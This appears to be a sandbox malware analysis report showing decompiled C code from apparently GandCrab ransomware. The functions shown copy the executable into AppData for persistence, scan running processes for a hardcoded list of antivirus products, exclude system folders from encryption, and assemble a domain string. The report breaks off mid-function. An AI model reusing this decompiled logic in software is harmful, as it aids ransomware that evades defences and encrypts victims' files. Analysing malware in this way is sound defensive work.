                                        Function 0F9D2AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114stringmemorythreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E0F9D2AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40);
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0F9D8090(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0F9D8150( &_v20, lstrlenW( &_v20));
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0F9D8090(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0F9D2890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0F9D2960(_t57, _t75);
					L17:
					ExitThread(0);
				}
			}




























                                        0x0f9d2ad6
                                        0x0f9d2aea
                                        0x0f9d2af0
                                        0x0f9d2af4
                                        0x0f9d2af6
                                        0x0f9d2b00
                                        0x0f9d2b1c
                                        0x0f9d2b1e
                                        0x0f9d2b1e
                                        0x0f9d2b02
                                        0x0f9d2b02
                                        0x0f9d2b02
                                        0x0f9d2b08
                                        0x0f9d2b10
                                        0x0f9d2b12
                                        0x0f9d2b14
                                        0x0f9d2b14
                                        0x0f9d2b28
                                        0x0f9d2b2c
                                        0x0f9d2b38
                                        0x0f9d2b3e
                                        0x0f9d2b43
                                        0x0f9d2b48
                                        0x0f9d2b4a
                                        0x0f9d2b55
                                        0x0f9d2b62
                                        0x0f9d2b67
                                        0x0f9d2b6c
                                        0x0f9d2b75
                                        0x0f9d2b89
                                        0x0f9d2b8e
                                        0x0f9d2b9c
                                        0x0f9d2ba2
                                        0x0f9d2ba5
                                        0x0f9d2ba7
                                        0x0f9d2bac
                                        0x0f9d2bae
                                        0x0f9d2be4
                                        0x0f9d2bec
                                        0x0f9d2bf4
                                        0x0f9d2bf6
                                        0x0f9d2bfd
                                        0x0f9d2c02
                                        0x0f9d2c05
                                        0x0f9d2c07
                                        0x00000000
                                        0x00000000
                                        0x0f9d2c0f
                                        0x0f9d2c11
                                        0x0f9d2c16
                                        0x0f9d2c1d
                                        0x0f9d2c2c
                                        0x0f9d2c2c
                                        0x0f9d2c2c
                                        0x0f9d2c2e
                                        0x0f9d2c2e
                                        0x0f9d2c2f
                                        0x0f9d2c35
                                        0x0f9d2c3b
                                        0x00000000
                                        0x0f9d2c3d
                                        0x0f9d2c25
                                        0x0f9d2c2a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d2c2a
                                        0x0f9d2bb6
                                        0x0f9d2bb8
                                        0x0f9d2bbd
                                        0x0f9d2bc4
                                        0x0f9d2bd3
                                        0x0f9d2bd3
                                        0x0f9d2bd3
                                        0x0f9d2bd5
                                        0x0f9d2bd5
                                        0x00000000
                                        0x0f9d2bd5
                                        0x0f9d2bcc
                                        0x0f9d2bd1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d2b4c
                                        0x0f9d2b4c
                                        0x0f9d2c40
                                        0x0f9d2c40
                                        0x0f9d2c45
                                        0x0f9d2c47
                                        0x0f9d2c47

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F9D2AEA
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D2B2C
                                        • GetTempPathW.KERNEL32(00000100,00000000), ref: 0F9D2B38
                                        • lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F9D2B7D
                                          • Part of subcall function 0F9D8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D816D
                                          • Part of subcall function 0F9D8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F9D819B
                                          • Part of subcall function 0F9D8150: GetModuleHandleA.KERNEL32(?), ref: 0F9D81EF
                                          • Part of subcall function 0F9D8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D81FD
                                          • Part of subcall function 0F9D8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D820C
                                          • Part of subcall function 0F9D8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8255
                                          • Part of subcall function 0F9D8150: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8263
                                        • GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F9D2B9C
                                        • lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0F9D2BE4
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D2BEC
                                        • lstrcatW.KERNEL32(00000000,.exe), ref: 0F9D2BF4
                                        • wsprintfW.USER32 ref: 0F9D2C35
                                        • ExitThread.KERNEL32 ref: 0F9D2C47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
                                        • String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
                                        • API String ID: 139215849-2398311915
                                        • Opcode ID: 366790f4bff83f47b6e17e53c1da527aa04f55fc77392764d0bc2271c6cedcb7
                                        • Instruction ID: 5bfa645b322da78216cd0de30451d37a07bd8da579e1f2a9c4deb6fbb3366e35
                                        • Opcode Fuzzy Hash: 366790f4bff83f47b6e17e53c1da527aa04f55fc77392764d0bc2271c6cedcb7
                                        • Instruction Fuzzy Hash: 7741F5702053119BE310DF30DC49B6B7B9CAFC4715F248828B646972C3DABCE958CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D7A10 Relevance: 25.6, APIs: 17, Instructions: 150memorystringprocessCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 80%
                                        			E0F9D7A10(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t49;
				WCHAR* _t56;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t75 = VirtualAlloc(0, 4, 0x3000, 4);
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c;
					_t49 = CreateToolhelp32Snapshot(2, 0);
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						if(Process32FirstW(_t49) != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									if(Process32NextW(_v20, _t75) != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000);
						CloseHandle(_v20);
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000);
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}































                                        0x0f9d7a2d
                                        0x0f9d7a2f
                                        0x0f9d7a3d
                                        0x0f9d7a3f
                                        0x0f9d7a46
                                        0x0f9d7a4d
                                        0x0f9d7a54
                                        0x0f9d7a5b
                                        0x0f9d7a62
                                        0x0f9d7a69
                                        0x0f9d7a70
                                        0x0f9d7a77
                                        0x0f9d7a7e
                                        0x0f9d7a85
                                        0x0f9d7a8c
                                        0x0f9d7a93
                                        0x0f9d7a9a
                                        0x0f9d7aa3
                                        0x0f9d7aa5
                                        0x0f9d7aaa
                                        0x0f9d7ad4
                                        0x0f9d7ada
                                        0x0f9d7aac
                                        0x0f9d7ab0
                                        0x0f9d7ab6
                                        0x0f9d7abc
                                        0x0f9d7ac2
                                        0x0f9d7adf
                                        0x0f9d7ae1
                                        0x0f9d7ae3
                                        0x0f9d7ae6
                                        0x0f9d7ae9
                                        0x0f9d7aec
                                        0x0f9d7af7
                                        0x00000000
                                        0x0f9d7b00
                                        0x0f9d7b08
                                        0x0f9d7b10
                                        0x0f9d7b1f
                                        0x0f9d7b23
                                        0x00000000
                                        0x0f9d7b25
                                        0x0f9d7b25
                                        0x0f9d7b25
                                        0x0f9d7b87
                                        0x0f9d7b87
                                        0x0f9d7b96
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d7b96
                                        0x0f9d7b2e
                                        0x0f9d7b2f
                                        0x0f9d7b31
                                        0x0f9d7b38
                                        0x0f9d7b55
                                        0x0f9d7b5e
                                        0x0f9d7b3a
                                        0x0f9d7b3a
                                        0x0f9d7b47
                                        0x0f9d7b47
                                        0x0f9d7b60
                                        0x0f9d7b7e
                                        0x0f9d7b81
                                        0x0f9d7b84
                                        0x00000000
                                        0x0f9d7b84
                                        0x0f9d7ba7
                                        0x0f9d7bab
                                        0x0f9d7bad
                                        0x0f9d7bb3
                                        0x0f9d7bc0
                                        0x0f9d7bc0
                                        0x0f9d7bb3
                                        0x0f9d7bcb
                                        0x0f9d7bcb
                                        0x0f9d7bdb
                                        0x0f9d7be0
                                        0x0f9d7be6
                                        0x0f9d7beb
                                        0x0f9d7bf5
                                        0x0f9d7bf5
                                        0x0f9d7bff
                                        0x0f9d7ac4
                                        0x0f9d7acc
                                        0x00000000
                                        0x0f9d7acc
                                        0x0f9d7ac2

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0F9D7A2D
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F9D7AA1
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F9D7AB6
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D7ACC
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F9D7AEF
                                        • lstrcmpiW.KERNEL32(0F9E033C,-00000024), ref: 0F9D7B15
                                        • Process32NextW.KERNEL32(?,?), ref: 0F9D7B8E
                                        • GetLastError.KERNEL32 ref: 0F9D7B98
                                        • lstrlenW.KERNEL32(00000000), ref: 0F9D7BB6
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D7BDB
                                        • CloseHandle.KERNEL32(?), ref: 0F9D7BE0
                                        • VirtualFree.KERNEL32(?,?,00008000), ref: 0F9D7BF5
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Free$AllocProcess32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32lstrcmpilstrlen
                                        • String ID:
                                        • API String ID: 2470459410-0
                                        • Opcode ID: 1b39d51b24d8480b3ab4d190a72af685bd5cc9a29853e9dcce0d9426bf61c672
                                        • Instruction ID: d91eadc4ebab5028d79b61ab884f1f471c505cee8502c7aabc89bbb6d883896a
                                        • Opcode Fuzzy Hash: 1b39d51b24d8480b3ab4d190a72af685bd5cc9a29853e9dcce0d9426bf61c672
                                        • Instruction Fuzzy Hash: 6E51BE71A05218EBDB218FA4D848B9EBBB8FF85724F208059F500AB2D2D7B85954CF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6640 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0F9D6640(void* __ecx) {
				void* _t10;
				intOrPtr* _t21;
				void* _t45;
				void* _t46;

				_t46 = __ecx;
				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0F9D8090(_t46, L"\\ProgramData\\") != 0 || E0F9D8090(_t46, L"\\Program Files\\") != 0 || E0F9D8090(_t46, L"\\Tor Browser\\") != 0 || E0F9D8090(_t46, L"Ransomware") != 0 || E0F9D8090(_t46, L"\\All Users\\") != 0 || E0F9D8090(_t46, L"\\Local Settings\\") != 0) {
					L16:
					VirtualFree(_t45, 0, 0x8000);
					return 0;
				} else {
					_t10 = E0F9D8090(_t46, L":\\Windows\\");
					if(_t10 != 0) {
						goto L16;
					} else {
						_t21 = __imp__SHGetSpecialFolderPathW;
						_push(_t10);
						_push(0x2a);
						_push(_t45);
						_push(_t10);
						if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t45);
							_push(0);
							if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
								_push(0);
								_push(0x24);
								_push(_t45);
								_push(0);
								if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t45);
									_push(0);
									if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
										VirtualFree(_t45, 0, 0x8000);
										return 1;
									} else {
										goto L16;
									}
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
						} else {
							goto L16;
						}
					}
				}
			}







                                        0x0f9d6651
                                        0x0f9d6660
                                        0x0f9d6669
                                        0x0f9d676c
                                        0x0f9d6775
                                        0x0f9d6780
                                        0x0f9d66d3
                                        0x0f9d66da
                                        0x0f9d66e1
                                        0x00000000
                                        0x0f9d66e7
                                        0x0f9d66e7
                                        0x0f9d66ed
                                        0x0f9d66ee
                                        0x0f9d66f0
                                        0x0f9d66f1
                                        0x0f9d66f6
                                        0x0f9d6705
                                        0x0f9d6707
                                        0x0f9d6709
                                        0x0f9d670a
                                        0x0f9d6710
                                        0x0f9d671f
                                        0x0f9d6721
                                        0x0f9d6723
                                        0x0f9d6724
                                        0x0f9d672a
                                        0x0f9d6739
                                        0x0f9d673b
                                        0x0f9d673d
                                        0x0f9d673e
                                        0x0f9d6744
                                        0x0f9d6760
                                        0x0f9d676b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d66f6
                                        0x0f9d66e1

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6653
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D66F2
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D670C
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6726
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6740
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6760
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6775
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FolderPathSpecial$Virtual$Free$Alloc
                                        • String ID: :\Windows\$Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
                                        • API String ID: 1363212851-2358141795
                                        • Opcode ID: 37cfdcb4eecc45faf3ac1ae2cc41a8a0902f3e6f99e1812a5e7fed6b1e8a32d4
                                        • Instruction ID: 63fb26e1ad6028de2f43eb3ec37fe6f1676d4bfc3e1055f10c589ee968b4916a
                                        • Opcode Fuzzy Hash: 37cfdcb4eecc45faf3ac1ae2cc41a8a0902f3e6f99e1812a5e7fed6b1e8a32d4
                                        • Instruction Fuzzy Hash: 5A312C2834071522F9A035B68E65B6F688E8BC1F95F74C415BB02DE2C3EF9DD9014699
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D5060 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 91memorystringsleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E0F9D5060() {
				WCHAR* _v8;
				intOrPtr _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v60;
				short _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xf9e04c0]");
				_v24 =  &_v80;
				asm("movdqu [ebp-0x4c], xmm0");
				_v20 =  &_v60;
				asm("movdqa xmm0, [0xf9e04d0]");
				_v64 = 0x6e;
				asm("movdqu [ebp-0x38], xmm0");
				_v44 = 0;
				_v40 = 0x646e6167;
				_v36 = 0x62617263;
				_v32 = 0x7469622e;
				_v28 = 0;
				_v16 =  &_v40;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x14));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0F9D4E90(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}




























                                        0x0f9d5066
                                        0x0f9d5076
                                        0x0f9d5081
                                        0x0f9d5086
                                        0x0f9d508c
                                        0x0f9d509b
                                        0x0f9d50a1
                                        0x0f9d50a6
                                        0x0f9d50aa
                                        0x0f9d50b1
                                        0x0f9d50b8
                                        0x0f9d50bf
                                        0x0f9d50c3
                                        0x0f9d50c6
                                        0x0f9d50cc
                                        0x0f9d50ce
                                        0x0f9d50d3
                                        0x0f9d50d9
                                        0x0f9d50db
                                        0x0f9d50e0
                                        0x0f9d50e2
                                        0x0f9d50e2
                                        0x0f9d50e6
                                        0x0f9d50e7
                                        0x0f9d50ed
                                        0x0f9d50f2
                                        0x0f9d50f4
                                        0x0f9d50f7
                                        0x0f9d50f7
                                        0x0f9d50fc
                                        0x0f9d5103
                                        0x0f9d5103
                                        0x0f9d512a
                                        0x0f9d512d
                                        0x0f9d512f
                                        0x0f9d5134
                                        0x0f9d513d
                                        0x0f9d5145
                                        0x00000000
                                        0x00000000
                                        0x0f9d514e
                                        0x0f9d5154
                                        0x0f9d5157
                                        0x0f9d5157
                                        0x0f9d515c
                                        0x0f9d5166
                                        0x0f9d5177
                                        0x0f9d517d
                                        0x0f9d517d
                                        0x0f9d5185

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 0F9D50C6
                                        • Sleep.KERNEL32(000003E8), ref: 0F9D5103
                                        • lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F9D5111
                                        • VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F9D5121
                                        • lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F9D513D
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D514E
                                        • wsprintfW.USER32 ref: 0F9D5166
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D5177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
                                        • String ID: .bit$crab$fabian wosar <3$gand$n
                                        • API String ID: 2709691373-4182624408
                                        • Opcode ID: 90803cdf302baef34d2629e262a4b3c90835efaf7b2a7602b99ca774b972a45e
                                        • Instruction ID: 9c36e470d450ed4055a241a1299acd72cf4b3d47c7fc362c8ce505c983dfb3d8
                                        • Opcode Fuzzy Hash: 90803cdf302baef34d2629e262a4b3c90835efaf7b2a7602b99ca774b972a45e
                                        • Instruction Fuzzy Hash: 9D310671E04319A7EB11CFA8DC85BEE7BBCAB44314F204115F606B72C2E7B45A508B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D7140 Relevance: 20.1, APIs: 16, Instructions: 120stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E0F9D7140(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
